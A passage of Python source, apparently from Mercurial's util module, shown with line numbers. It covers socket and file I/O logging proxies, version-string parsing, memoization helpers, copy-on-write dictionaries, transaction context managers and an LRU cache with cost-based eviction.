649 649 __bool__ = __nonzero__
650 650
651 651 def _observedcall(self, name, *args, **kwargs):
652 652 # Call the original object.
653 653 orig = object.__getattribute__(self, r'_orig')
654 654 res = getattr(orig, name)(*args, **kwargs)
655 655
656 656 # Call a method on the observer of the same name with arguments
657 657 # so it can react, log, etc.
658 658 observer = object.__getattribute__(self, r'_observer')
659 659 fn = getattr(observer, name, None)
660 660 if fn:
661 661 fn(res, *args, **kwargs)
662 662
663 663 return res
664 664
665 665 def makefile(self, *args, **kwargs):
666 666 res = object.__getattribute__(self, r'_observedcall')(
667 667 r'makefile', *args, **kwargs)
668 668
669 669 # The file object may be used for I/O. So we turn it into a
670 670 # proxy using our observer.
671 671 observer = object.__getattribute__(self, r'_observer')
672 672 return makeloggingfileobject(observer.fh, res, observer.name,
673 673 reads=observer.reads,
674 674 writes=observer.writes,
675 675 logdata=observer.logdata,
676 676 logdataapis=observer.logdataapis)
677 677
678 678 def recv(self, *args, **kwargs):
679 679 return object.__getattribute__(self, r'_observedcall')(
680 680 r'recv', *args, **kwargs)
681 681
682 682 def recvfrom(self, *args, **kwargs):
683 683 return object.__getattribute__(self, r'_observedcall')(
684 684 r'recvfrom', *args, **kwargs)
685 685
686 686 def recvfrom_into(self, *args, **kwargs):
687 687 return object.__getattribute__(self, r'_observedcall')(
688 688 r'recvfrom_into', *args, **kwargs)
689 689
690 690 def recv_into(self, *args, **kwargs):
691 691 return object.__getattribute__(self, r'_observedcall')(
692 692 r'recv_into', *args, **kwargs)
693 693
694 694 def send(self, *args, **kwargs):
695 695 return object.__getattribute__(self, r'_observedcall')(
696 696 r'send', *args, **kwargs)
697 697
698 698 def sendall(self, *args, **kwargs):
699 699 return object.__getattribute__(self, r'_observedcall')(
700 700 r'sendall', *args, **kwargs)
701 701
702 702 def sendto(self, *args, **kwargs):
703 703 return object.__getattribute__(self, r'_observedcall')(
704 704 r'sendto', *args, **kwargs)
705 705
706 706 def setblocking(self, *args, **kwargs):
707 707 return object.__getattribute__(self, r'_observedcall')(
708 708 r'setblocking', *args, **kwargs)
709 709
710 710 def settimeout(self, *args, **kwargs):
711 711 return object.__getattribute__(self, r'_observedcall')(
712 712 r'settimeout', *args, **kwargs)
713 713
714 714 def gettimeout(self, *args, **kwargs):
715 715 return object.__getattribute__(self, r'_observedcall')(
716 716 r'gettimeout', *args, **kwargs)
717 717
718 718 def setsockopt(self, *args, **kwargs):
719 719 return object.__getattribute__(self, r'_observedcall')(
720 720 r'setsockopt', *args, **kwargs)
721 721
722 722 class baseproxyobserver(object):
723 723 def _writedata(self, data):
724 724 if not self.logdata:
725 725 if self.logdataapis:
726 726 self.fh.write('\n')
727 727 self.fh.flush()
728 728 return
729 729
730 730 # Simple case writes all data on a single line.
731 731 if b'\n' not in data:
732 732 if self.logdataapis:
733 733 self.fh.write(': %s\n' % stringutil.escapestr(data))
734 734 else:
735 735 self.fh.write('%s> %s\n'
736 736 % (self.name, stringutil.escapestr(data)))
737 737 self.fh.flush()
738 738 return
739 739
740 740 # Data with newlines is written to multiple lines.
741 741 if self.logdataapis:
742 742 self.fh.write(':\n')
743 743
744 744 lines = data.splitlines(True)
745 745 for line in lines:
746 746 self.fh.write('%s> %s\n'
747 747 % (self.name, stringutil.escapestr(line)))
748 748 self.fh.flush()
749 749
750 750 class fileobjectobserver(baseproxyobserver):
751 751 """Logs file object activity."""
752 752 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
753 753 logdataapis=True):
754 754 self.fh = fh
755 755 self.name = name
756 756 self.logdata = logdata
757 757 self.logdataapis = logdataapis
758 758 self.reads = reads
759 759 self.writes = writes
760 760
761 761 def read(self, res, size=-1):
762 762 if not self.reads:
763 763 return
764 764 # Python 3 can return None from reads at EOF instead of empty strings.
765 765 if res is None:
766 766 res = ''
767 767
768 768 if size == -1 and res == '':
769 769 # Suppress pointless read(-1) calls that return
770 770 # nothing. These happen _a lot_ on Python 3, and there
771 771 # doesn't seem to be a better workaround to have matching
772 772 # Python 2 and 3 behavior. :(
773 773 return
774 774
775 775 if self.logdataapis:
776 776 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
777 777
778 778 self._writedata(res)
779 779
780 780 def readline(self, res, limit=-1):
781 781 if not self.reads:
782 782 return
783 783
784 784 if self.logdataapis:
785 785 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
786 786
787 787 self._writedata(res)
788 788
789 789 def readinto(self, res, dest):
790 790 if not self.reads:
791 791 return
792 792
793 793 if self.logdataapis:
794 794 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
795 795 res))
796 796
797 797 data = dest[0:res] if res is not None else b''
798 798
799 799 # _writedata() uses "in" operator and is confused by memoryview because
800 800 # characters are ints on Python 3.
801 801 if isinstance(data, memoryview):
802 802 data = data.tobytes()
803 803
804 804 self._writedata(data)
805 805
806 806 def write(self, res, data):
807 807 if not self.writes:
808 808 return
809 809
810 810 # Python 2 returns None from some write() calls. Python 3 (reasonably)
811 811 # returns the integer bytes written.
812 812 if res is None and data:
813 813 res = len(data)
814 814
815 815 if self.logdataapis:
816 816 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
817 817
818 818 self._writedata(data)
819 819
820 820 def flush(self, res):
821 821 if not self.writes:
822 822 return
823 823
824 824 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
825 825
826 826 # For observedbufferedinputpipe.
827 827 def bufferedread(self, res, size):
828 828 if not self.reads:
829 829 return
830 830
831 831 if self.logdataapis:
832 832 self.fh.write('%s> bufferedread(%d) -> %d' % (
833 833 self.name, size, len(res)))
834 834
835 835 self._writedata(res)
836 836
837 837 def bufferedreadline(self, res):
838 838 if not self.reads:
839 839 return
840 840
841 841 if self.logdataapis:
842 842 self.fh.write('%s> bufferedreadline() -> %d' % (
843 843 self.name, len(res)))
844 844
845 845 self._writedata(res)
846 846
847 847 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
848 848 logdata=False, logdataapis=True):
849 849 """Turn a file object into a logging file object."""
850 850
851 851 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
852 852 logdata=logdata, logdataapis=logdataapis)
853 853 return fileobjectproxy(fh, observer)
854 854
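A hedged usage sketch (the names are hypothetical; the log format follows
fileobjectobserver above):

    import io
    import sys

    fh = makeloggingfileobject(sys.stderr, io.BytesIO(b'hello\n'), 'example',
                               logdata=True)
    fh.readline()
    # writes something like the following to sys.stderr:
    #   example> readline() -> 6:
    #   example> hello\n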
855 855 class socketobserver(baseproxyobserver):
856 856 """Logs socket activity."""
857 857 def __init__(self, fh, name, reads=True, writes=True, states=True,
858 858 logdata=False, logdataapis=True):
859 859 self.fh = fh
860 860 self.name = name
861 861 self.reads = reads
862 862 self.writes = writes
863 863 self.states = states
864 864 self.logdata = logdata
865 865 self.logdataapis = logdataapis
866 866
867 867 def makefile(self, res, mode=None, bufsize=None):
868 868 if not self.states:
869 869 return
870 870
871 871 self.fh.write('%s> makefile(%r, %r)\n' % (
872 872 self.name, mode, bufsize))
873 873
874 874 def recv(self, res, size, flags=0):
875 875 if not self.reads:
876 876 return
877 877
878 878 if self.logdataapis:
879 879 self.fh.write('%s> recv(%d, %d) -> %d' % (
880 880 self.name, size, flags, len(res)))
881 881 self._writedata(res)
882 882
883 883 def recvfrom(self, res, size, flags=0):
884 884 if not self.reads:
885 885 return
886 886
887 887 if self.logdataapis:
888 888 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
889 889 self.name, size, flags, len(res[0])))
890 890
891 891 self._writedata(res[0])
892 892
893 893 def recvfrom_into(self, res, buf, size, flags=0):
894 894 if not self.reads:
895 895 return
896 896
897 897 if self.logdataapis:
898 898 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
899 899 self.name, size, flags, res[0]))
900 900
901 901 self._writedata(buf[0:res[0]])
902 902
903 903 def recv_into(self, res, buf, size=0, flags=0):
904 904 if not self.reads:
905 905 return
906 906
907 907 if self.logdataapis:
908 908 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
909 909 self.name, size, flags, res))
910 910
911 911 self._writedata(buf[0:res])
912 912
913 913 def send(self, res, data, flags=0):
914 914 if not self.writes:
915 915 return
916 916
917 917 self.fh.write('%s> send(%d, %d) -> %d' % (
918 918 self.name, len(data), flags, len(res)))
919 919 self._writedata(data)
920 920
921 921 def sendall(self, res, data, flags=0):
922 922 if not self.writes:
923 923 return
924 924
925 925 if self.logdataapis:
926 926 # Returns None on success. So don't bother reporting return value.
927 927 self.fh.write('%s> sendall(%d, %d)' % (
928 928 self.name, len(data), flags))
929 929
930 930 self._writedata(data)
931 931
932 932 def sendto(self, res, data, flagsoraddress, address=None):
933 933 if not self.writes:
934 934 return
935 935
936 936 if address:
937 937 flags = flagsoraddress
938 938 else:
939 939 flags = 0
940 940
941 941 if self.logdataapis:
942 942 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
943 943 self.name, len(data), flags, address, res))
944 944
945 945 self._writedata(data)
946 946
947 947 def setblocking(self, res, flag):
948 948 if not self.states:
949 949 return
950 950
951 951 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
952 952
953 953 def settimeout(self, res, value):
954 954 if not self.states:
955 955 return
956 956
957 957 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
958 958
959 959 def gettimeout(self, res):
960 960 if not self.states:
961 961 return
962 962
963 963 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
964 964
965 965 def setsockopt(self, res, level, optname, value):
966 966 if not self.states:
967 967 return
968 968
969 969 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
970 970 self.name, level, optname, value, res))
971 971
972 972 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
973 973 logdata=False, logdataapis=True):
974 974 """Turn a socket into a logging socket."""
975 975
976 976 observer = socketobserver(logh, name, reads=reads, writes=writes,
977 977 states=states, logdata=logdata,
978 978 logdataapis=logdataapis)
979 979 return socketproxy(fh, observer)
980 980
981 981 def version():
982 982 """Return version information if available."""
983 983 try:
984 984 from . import __version__
985 985 return __version__.version
986 986 except ImportError:
987 987 return 'unknown'
988 988
989 989 def versiontuple(v=None, n=4):
990 990 """Parses a Mercurial version string into an N-tuple.
991 991
992 992 The version string to be parsed is specified with the ``v`` argument.
993 993 If it isn't defined, the current Mercurial version string will be parsed.
994 994
995 995 ``n`` can be 2, 3, or 4. Here is how some version strings map to
996 996 returned values:
997 997
998 998 >>> v = b'3.6.1+190-df9b73d2d444'
999 999 >>> versiontuple(v, 2)
1000 1000 (3, 6)
1001 1001 >>> versiontuple(v, 3)
1002 1002 (3, 6, 1)
1003 1003 >>> versiontuple(v, 4)
1004 1004 (3, 6, 1, '190-df9b73d2d444')
1005 1005
1006 1006 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1007 1007 (3, 6, 1, '190-df9b73d2d444+20151118')
1008 1008
1009 1009 >>> v = b'3.6'
1010 1010 >>> versiontuple(v, 2)
1011 1011 (3, 6)
1012 1012 >>> versiontuple(v, 3)
1013 1013 (3, 6, None)
1014 1014 >>> versiontuple(v, 4)
1015 1015 (3, 6, None, None)
1016 1016
1017 1017 >>> v = b'3.9-rc'
1018 1018 >>> versiontuple(v, 2)
1019 1019 (3, 9)
1020 1020 >>> versiontuple(v, 3)
1021 1021 (3, 9, None)
1022 1022 >>> versiontuple(v, 4)
1023 1023 (3, 9, None, 'rc')
1024 1024
1025 1025 >>> v = b'3.9-rc+2-02a8fea4289b'
1026 1026 >>> versiontuple(v, 2)
1027 1027 (3, 9)
1028 1028 >>> versiontuple(v, 3)
1029 1029 (3, 9, None)
1030 1030 >>> versiontuple(v, 4)
1031 1031 (3, 9, None, 'rc+2-02a8fea4289b')
1032 1032
1033 1033 >>> versiontuple(b'4.6rc0')
1034 1034 (4, 6, None, 'rc0')
1035 1035 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1036 1036 (4, 6, None, 'rc0+12-425d55e54f98')
1037 1037 >>> versiontuple(b'.1.2.3')
1038 1038 (None, None, None, '.1.2.3')
1039 1039 >>> versiontuple(b'12.34..5')
1040 1040 (12, 34, None, '..5')
1041 1041 >>> versiontuple(b'1.2.3.4.5.6')
1042 1042 (1, 2, 3, '.4.5.6')
1043 1043 """
1044 1044 if not v:
1045 1045 v = version()
1046 1046 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1047 1047 if not m:
1048 1048 vparts, extra = '', v
1049 1049 elif m.group(2):
1050 1050 vparts, extra = m.groups()
1051 1051 else:
1052 1052 vparts, extra = m.group(1), None
1053 1053
1054 1054 vints = []
1055 1055 for i in vparts.split('.'):
1056 1056 try:
1057 1057 vints.append(int(i))
1058 1058 except ValueError:
1059 1059 break
1060 1060 # (3, 6) -> (3, 6, None)
1061 1061 while len(vints) < 3:
1062 1062 vints.append(None)
1063 1063
1064 1064 if n == 2:
1065 1065 return (vints[0], vints[1])
1066 1066 if n == 3:
1067 1067 return (vints[0], vints[1], vints[2])
1068 1068 if n == 4:
1069 1069 return (vints[0], vints[1], vints[2], extra)
1070 1070
1071 1071 def cachefunc(func):
1072 1072 '''cache the result of function calls'''
1073 1073 # XXX doesn't handle keywords args
1074 1074 if func.__code__.co_argcount == 0:
1075 1075 cache = []
1076 1076 def f():
1077 1077 if len(cache) == 0:
1078 1078 cache.append(func())
1079 1079 return cache[0]
1080 1080 return f
1081 1081 cache = {}
1082 1082 if func.__code__.co_argcount == 1:
1083 1083 # we gain a small amount of time because
1084 1084 # we don't need to pack/unpack the list
1085 1085 def f(arg):
1086 1086 if arg not in cache:
1087 1087 cache[arg] = func(arg)
1088 1088 return cache[arg]
1089 1089 else:
1090 1090 def f(*args):
1091 1091 if args not in cache:
1092 1092 cache[args] = func(*args)
1093 1093 return cache[args]
1094 1094
1095 1095 return f
1096 1096
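A hedged usage sketch (`fib` is a hypothetical example function):

    @cachefunc
    def fib(n):
        # recursive calls go through the memoized wrapper, so each
        # distinct n is computed only once
        return n if n < 2 else fib(n - 1) + fib(n - 2)

    assert fib(30) == 832040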
1097 1097 class cow(object):
1098 1098 """helper class to make copy-on-write easier
1099 1099
1100 1100 Call preparewrite before doing any writes.
1101 1101 """
1102 1102
1103 1103 def preparewrite(self):
1104 1104 """call this before writes, return self or a copied new object"""
1105 1105 if getattr(self, '_copied', 0):
1106 1106 self._copied -= 1
1107 1107 return self.__class__(self)
1108 1108 return self
1109 1109
1110 1110 def copy(self):
1111 1111 """always do a cheap copy"""
1112 1112 self._copied = getattr(self, '_copied', 0) + 1
1113 1113 return self
1114 1114
1115 1115 class sortdict(collections.OrderedDict):
1116 1116 '''a simple sorted dictionary
1117 1117
1118 1118 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1119 1119 >>> d2 = d1.copy()
1120 1120 >>> d2
1121 1121 sortdict([('a', 0), ('b', 1)])
1122 1122 >>> d2.update([(b'a', 2)])
1123 1123 >>> list(d2.keys()) # should still be in last-set order
1124 1124 ['b', 'a']
1125 1125 '''
1126 1126
1127 1127 def __setitem__(self, key, value):
1128 1128 if key in self:
1129 1129 del self[key]
1130 1130 super(sortdict, self).__setitem__(key, value)
1131 1131
1132 1132 if pycompat.ispypy:
1133 1133 # __setitem__() isn't called as of PyPy 5.8.0
1134 1134 def update(self, src):
1135 1135 if isinstance(src, dict):
1136 1136 src = src.iteritems()
1137 1137 for k, v in src:
1138 1138 self[k] = v
1139 1139
1140 1140 class cowdict(cow, dict):
1141 1141 """copy-on-write dict
1142 1142
1143 1143 Be sure to call d = d.preparewrite() before writing to d.
1144 1144
1145 1145 >>> a = cowdict()
1146 1146 >>> a is a.preparewrite()
1147 1147 True
1148 1148 >>> b = a.copy()
1149 1149 >>> b is a
1150 1150 True
1151 1151 >>> c = b.copy()
1152 1152 >>> c is a
1153 1153 True
1154 1154 >>> a = a.preparewrite()
1155 1155 >>> b is a
1156 1156 False
1157 1157 >>> a is a.preparewrite()
1158 1158 True
1159 1159 >>> c = c.preparewrite()
1160 1160 >>> b is c
1161 1161 False
1162 1162 >>> b is b.preparewrite()
1163 1163 True
1164 1164 """
1165 1165
1166 1166 class cowsortdict(cow, sortdict):
1167 1167 """copy-on-write sortdict
1168 1168
1169 1169 Be sure to call d = d.preparewrite() before writing to d.
1170 1170 """
1171 1171
1172 1172 class transactional(object):
1173 1173 """Base class for making a transactional type into a context manager."""
1174 1174 __metaclass__ = abc.ABCMeta
1175 1175
1176 1176 @abc.abstractmethod
1177 1177 def close(self):
1178 1178 """Successfully closes the transaction."""
1179 1179
1180 1180 @abc.abstractmethod
1181 1181 def release(self):
1182 1182 """Marks the end of the transaction.
1183 1183
1184 1184 If the transaction has not been closed, it will be aborted.
1185 1185 """
1186 1186
1187 1187 def __enter__(self):
1188 1188 return self
1189 1189
1190 1190 def __exit__(self, exc_type, exc_val, exc_tb):
1191 1191 try:
1192 1192 if exc_type is None:
1193 1193 self.close()
1194 1194 finally:
1195 1195 self.release()
1196 1196
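A hedged sketch of a minimal subclass (hypothetical, for exposition of the
context-manager contract above):

    class demotxn(transactional):
        def __init__(self):
            self.state = 'pending'

        def close(self):
            self.state = 'committed'

        def release(self):
            # abort unless close() already ran
            if self.state == 'pending':
                self.state = 'aborted'

    with demotxn() as tr:
        pass                    # no exception: close(), then release()
    assert tr.state == 'committed'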
1197 1197 @contextlib.contextmanager
1198 1198 def acceptintervention(tr=None):
1199 1199 """A context manager that closes the transaction on InterventionRequired
1200 1200
1201 1201 If no transaction was provided, this simply runs the body and returns
1202 1202 """
1203 1203 if not tr:
1204 1204 yield
1205 1205 return
1206 1206 try:
1207 1207 yield
1208 1208 tr.close()
1209 1209 except error.InterventionRequired:
1210 1210 tr.close()
1211 1211 raise
1212 1212 finally:
1213 1213 tr.release()
1214 1214
1215 1215 @contextlib.contextmanager
1216 1216 def nullcontextmanager():
1217 1217 yield
1218 1218
1219 1219 class _lrucachenode(object):
1220 1220 """A node in a doubly linked list.
1221 1221
1222 1222 Holds a reference to nodes on either side as well as a key-value
1223 1223 pair for the dictionary entry.
1224 1224 """
1225 1225 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1226 1226
1227 1227 def __init__(self):
1228 1228 self.next = None
1229 1229 self.prev = None
1230 1230
1231 1231 self.key = _notset
1232 1232 self.value = None
1233 1233 self.cost = 0
1234 1234
1235 1235 def markempty(self):
1236 1236 """Mark the node as emptied."""
1237 1237 self.key = _notset
1238 1238 self.value = None
1239 1239 self.cost = 0
1240 1240
1241 1241 class lrucachedict(object):
1242 1242 """Dict that caches most recent accesses and sets.
1243 1243
1244 1244 The dict consists of an actual backing dict - indexed by original
1245 1245 key - and a doubly linked circular list defining the order of entries in
1246 1246 the cache.
1247 1247
1248 1248 The head node is the newest entry in the cache. If the cache is full,
1249 1249 we recycle head.prev and make it the new head. Cache accesses result in
1250 1250 the node being moved to before the existing head and being marked as the
1251 1251 new head node.
1252 1252
1253 1253 Items in the cache can be inserted with an optional "cost" value. This is
1254 1254 simply an integer that is specified by the caller. The cache can be queried
1255 1255 for the total cost of all items presently in the cache.
1256 1256
1257 1257 The cache can also define a maximum cost. If a cache insertion would
1258 1258 cause the total cost of the cache to go beyond the maximum cost limit,
1259 1259 nodes will be evicted to make room for the new node. This can be used
1260 1260 to e.g. set a max memory limit and associate an estimated bytes size
1261 1261 cost to each item in the cache. By default, no maximum cost is enforced.
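
For illustration, a small sketch of the eviction behavior described above
(all names are from this class):

>>> d = lrucachedict(2)
>>> d.insert(b'a', b'va', cost=2)
>>> d.insert(b'b', b'vb', cost=5)
>>> d[b'a']  # accessing b'a' makes it the most recently used entry
'va'
>>> d.insert(b'c', b'vc')  # the cache is full: evicts b'b', the oldest entry
>>> b'b' in d
False
>>> d.totalcost
2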
1262 1262 """
1263 1263 def __init__(self, max, maxcost=0):
1264 1264 self._cache = {}
1265 1265
1266 1266 self._head = head = _lrucachenode()
1267 1267 head.prev = head
1268 1268 head.next = head
1269 1269 self._size = 1
1270 1270 self.capacity = max
1271 1271 self.totalcost = 0
1272 1272 self.maxcost = maxcost
1273 1273
1274 1274 def __len__(self):
1275 1275 return len(self._cache)
1276 1276
1277 1277 def __contains__(self, k):
1278 1278 return k in self._cache
1279 1279
1280 1280 def __iter__(self):
1281 1281 # We don't have to iterate in cache order, but why not.
1282 1282 n = self._head
1283 1283 for i in range(len(self._cache)):
1284 1284 yield n.key
1285 1285 n = n.next
1286 1286
1287 1287 def __getitem__(self, k):
1288 1288 node = self._cache[k]
1289 1289 self._movetohead(node)
1290 1290 return node.value
1291 1291
1292 1292 def insert(self, k, v, cost=0):
1293 1293 """Insert a new item in the cache with optional cost value."""
1294 1294 node = self._cache.get(k)
1295 1295 # Replace existing value and mark as newest.
1296 1296 if node is not None:
1297 1297 self.totalcost -= node.cost
1298 1298 node.value = v
1299 1299 node.cost = cost
1300 1300 self.totalcost += cost
1301 1301 self._movetohead(node)
1302 1302
1303 1303 if self.maxcost:
1304 1304 self._enforcecostlimit()
1305 1305
1306 1306 return
1307 1307
1308 1308 if self._size < self.capacity:
1309 1309 node = self._addcapacity()
1310 1310 else:
1311 1311 # Grab the last/oldest item.
1312 1312 node = self._head.prev
1313 1313
1314 1314 # At capacity. Kill the old entry.
1315 1315 if node.key is not _notset:
1316 1316 self.totalcost -= node.cost
1317 1317 del self._cache[node.key]
1318 1318
1319 1319 node.key = k
1320 1320 node.value = v
1321 1321 node.cost = cost
1322 1322 self.totalcost += cost
1323 1323 self._cache[k] = node
1324 1324 # And mark it as newest entry. No need to adjust order since it
1325 1325 # is already self._head.prev.
1326 1326 self._head = node
1327 1327
1328 1328 if self.maxcost:
1329 1329 self._enforcecostlimit()
1330 1330
1331 1331 def __setitem__(self, k, v):
1332 1332 self.insert(k, v)
1333 1333
1334 1334 def __delitem__(self, k):
1335 1335 self.pop(k)
1336 1336
1337 1337 def pop(self, k, default=_notset):
1338 1338 try:
1339 1339 node = self._cache.pop(k)
1340 1340 except KeyError:
1341 1341 if default is _notset:
1342 1342 raise
1343 1343 return default
1344 1344 value = node.value
1345 1345 self.totalcost -= node.cost
1346 1346 node.markempty()
1347 1347
1348 1348 # Temporarily mark as newest item before re-adjusting head to make
1349 1349 # this node the oldest item.
1350 1350 self._movetohead(node)
1351 1351 self._head = node.next
1352 1352
1353 1353 return value
1354 1354
1355 1355 # Additional dict methods.
1356 1356
1357 1357 def get(self, k, default=None):
1358 1358 try:
1359 1359 return self.__getitem__(k)
1360 1360 except KeyError:
1361 1361 return default
1362 1362
1363 1363 def peek(self, k, default=_notset):
1364 1364 """Get the specified item without moving it to the head
1365 1365
1366 1366 Unlike get(), this doesn't mutate the internal state. But be aware
1367 1367 that this does not make peek() thread safe.
1368 1368 """
1369 1369 try:
1370 1370 node = self._cache[k]
1371 1371 return node.value
1372 1372 except KeyError:
1373 1373 if default is _notset:
1374 1374 raise
1375 1375 return default
1376 1376
1377 1377 def clear(self):
1378 1378 n = self._head
1379 1379 while n.key is not _notset:
1380 1380 self.totalcost -= n.cost
1381 1381 n.markempty()
1382 1382 n = n.next
1383 1383
1384 1384 self._cache.clear()
1385 1385
1386 1386 def copy(self, capacity=None, maxcost=0):
1387 1387 """Create a new cache as a copy of the current one.
1388 1388
1389 1389 By default, the new cache has the same capacity as the existing one.
1390 1390 But, the cache capacity can be changed as part of performing the
1391 1391 copy.
1392 1392
1393 1393 Items in the copy have an insertion/access order matching this
1394 1394 instance.
1395 1395 """
1396 1396
1397 1397 capacity = capacity or self.capacity
1398 1398 maxcost = maxcost or self.maxcost
1399 1399 result = lrucachedict(capacity, maxcost=maxcost)
1400 1400
1401 1401 # We copy entries by iterating in oldest-to-newest order so the copy
1402 1402 # has the correct ordering.
1403 1403
1404 1404 # Find the first non-empty entry.
1405 1405 n = self._head.prev
1406 1406 while n.key is _notset and n is not self._head:
1407 1407 n = n.prev
1408 1408
1409 1409 # We could potentially skip the first N items when decreasing capacity.
1410 1410 # But let's keep it simple unless it is a performance problem.
1411 1411 for i in range(len(self._cache)):
1412 1412 result.insert(n.key, n.value, cost=n.cost)
1413 1413 n = n.prev
1414 1414
1415 1415 return result
1416 1416
1417 1417 def popoldest(self):
1418 1418 """Remove the oldest item from the cache.
1419 1419
1420 1420 Returns the (key, value) describing the removed cache entry.
1421 1421 """
1422 1422 if not self._cache:
1423 1423 return
1424 1424
1425 1425 # Walk the linked list backwards starting at tail node until we hit
1426 1426 # a non-empty node.
1427 1427 n = self._head.prev
1428 1428 while n.key is _notset:
1429 1429 n = n.prev
1430 1430
1431 1431 key, value = n.key, n.value
1432 1432
1433 1433 # And remove it from the cache and mark it as empty.
1434 1434 del self._cache[n.key]
1435 1435 self.totalcost -= n.cost
1436 1436 n.markempty()
1437 1437
1438 1438 return key, value
1439 1439
1440 1440 def _movetohead(self, node):
1441 1441 """Mark a node as the newest, making it the new head.
1442 1442
1443 1443 When a node is accessed, it becomes the freshest entry in the LRU
1444 1444 list, which is denoted by self._head.
1445 1445
1446 1446 Visually, let's make ``N`` the new head node (* denotes head):
1447 1447
1448 1448 previous/oldest <-> head <-> next/next newest
1449 1449
1450 1450 ----<->--- A* ---<->-----
1451 1451 | |
1452 1452 E <-> D <-> N <-> C <-> B
1453 1453
1454 1454 To:
1455 1455
1456 1456 ----<->--- N* ---<->-----
1457 1457 | |
1458 1458 E <-> D <-> C <-> B <-> A
1459 1459
1460 1460 This requires the following moves:
1461 1461
1462 1462 C.next = D (node.prev.next = node.next)
1463 1463 D.prev = C (node.next.prev = node.prev)
1464 1464 E.next = N (head.prev.next = node)
1465 1465 N.prev = E (node.prev = head.prev)
1466 1466 N.next = A (node.next = head)
1467 1467 A.prev = N (head.prev = node)
1468 1468 """
1469 1469 head = self._head
1470 1470 # C.next = D
1471 1471 node.prev.next = node.next
1472 1472 # D.prev = C
1473 1473 node.next.prev = node.prev
1474 1474 # N.prev = E
1475 1475 node.prev = head.prev
1476 1476 # N.next = A
1477 1477 # It is tempting to do just "head" here, however if node is
1478 1478 # adjacent to head, this will do bad things.
1479 1479 node.next = head.prev.next
1480 1480 # E.next = N
1481 1481 node.next.prev = node
1482 1482 # A.prev = N
1483 1483 node.prev.next = node
1484 1484
1485 1485 self._head = node
1486 1486
1487 1487 def _addcapacity(self):
1488 1488 """Add a node to the circular linked list.
1489 1489
1490 1490 The new node is inserted before the head node.
1491 1491 """
1492 1492 head = self._head
1493 1493 node = _lrucachenode()
1494 1494 head.prev.next = node
1495 1495 node.prev = head.prev
1496 1496 node.next = head
1497 1497 head.prev = node
1498 1498 self._size += 1
1499 1499 return node
1500 1500
1501 1501 def _enforcecostlimit(self):
1502 1502 # This should run after an insertion. It should only be called if total
1503 1503 # cost limits are being enforced.
1504 1504 # The most recently inserted node is never evicted.
1505 1505 if len(self) <= 1 or self.totalcost <= self.maxcost:
1506 1506 return
1507 1507
1508 1508 # This is logically equivalent to calling popoldest() until we
1509 1509 # free up enough cost. We don't do that since popoldest() needs
1510 1510 # to walk the linked list and doing this in a loop would be
1511 1511 # quadratic. So we find the first non-empty node and then
1512 1512 # walk nodes until we free up enough capacity.
1513 1513 #
1514 1514 # If we only removed the minimum number of nodes to free enough
1515 1515 # cost at insert time, chances are high that the next insert would
1516 1516 # also require pruning. This would effectively constitute quadratic
1517 1517 # behavior for insert-heavy workloads. To mitigate this, we set a
1518 1518 # target cost that is a percentage of the max cost. This will tend
1519 1519 # to free more nodes when the high water mark is reached, which
1520 1520 # lowers the chances of needing to prune on the subsequent insert.
1521 1521 targetcost = int(self.maxcost * 0.75)
1522 1522
1523 1523 n = self._head.prev
1524 1524 while n.key is _notset:
1525 1525 n = n.prev
1526 1526
1527 1527 while len(self) > 1 and self.totalcost > targetcost:
1528 1528 del self._cache[n.key]
1529 1529 self.totalcost -= n.cost
1530 1530 n.markempty()
1531 1531 n = n.prev
1532 1532
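# Illustrative sketch (not part of the original module): lrucachedict
# usage, including cost-based eviction. Keys, values and costs here are
# arbitrary.
#
#     d = lrucachedict(4, maxcost=1000)
#     d.insert('a', 'va', cost=300)
#     d.insert('b', 'vb', cost=300)
#     d.insert('c', 'vc', cost=300)
#     d['a']                         # access makes 'a' the newest entry
#     d.insert('d', 'vd', cost=600)  # total cost 1500 > maxcost, so
#                                    # entries are evicted oldest-first
#                                    # ('b', 'c', then 'a') until the
#                                    # total drops to <= 750 (75% of
#                                    # maxcost); only 'd' remains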
1533 1533 def lrucachefunc(func):
1534 1534 '''cache most recent results of function calls'''
1535 1535 cache = {}
1536 1536 order = collections.deque()
1537 1537 if func.__code__.co_argcount == 1:
1538 1538 def f(arg):
1539 1539 if arg not in cache:
1540 1540 if len(cache) > 20:
1541 1541 del cache[order.popleft()]
1542 1542 cache[arg] = func(arg)
1543 1543 else:
1544 1544 order.remove(arg)
1545 1545 order.append(arg)
1546 1546 return cache[arg]
1547 1547 else:
1548 1548 def f(*args):
1549 1549 if args not in cache:
1550 1550 if len(cache) > 20:
1551 1551 del cache[order.popleft()]
1552 1552 cache[args] = func(*args)
1553 1553 else:
1554 1554 order.remove(args)
1555 1555 order.append(args)
1556 1556 return cache[args]
1557 1557
1558 1558 return f
1559 1559
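# Illustrative sketch (not part of the original module): lrucachefunc
# memoizes a function over its most recent (roughly 20) distinct
# arguments.
#
#     @lrucachefunc
#     def normalize(path):
#         return path.replace('\\', '/').lower()
#
#     normalize('A\\B')   # computed and cached
#     normalize('A\\B')   # served from the cache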
1560 1560 class propertycache(object):
1561 1561 def __init__(self, func):
1562 1562 self.func = func
1563 1563 self.name = func.__name__
1564 1564 def __get__(self, obj, type=None):
1565 1565 result = self.func(obj)
1566 1566 self.cachevalue(obj, result)
1567 1567 return result
1568 1568
1569 1569 def cachevalue(self, obj, value):
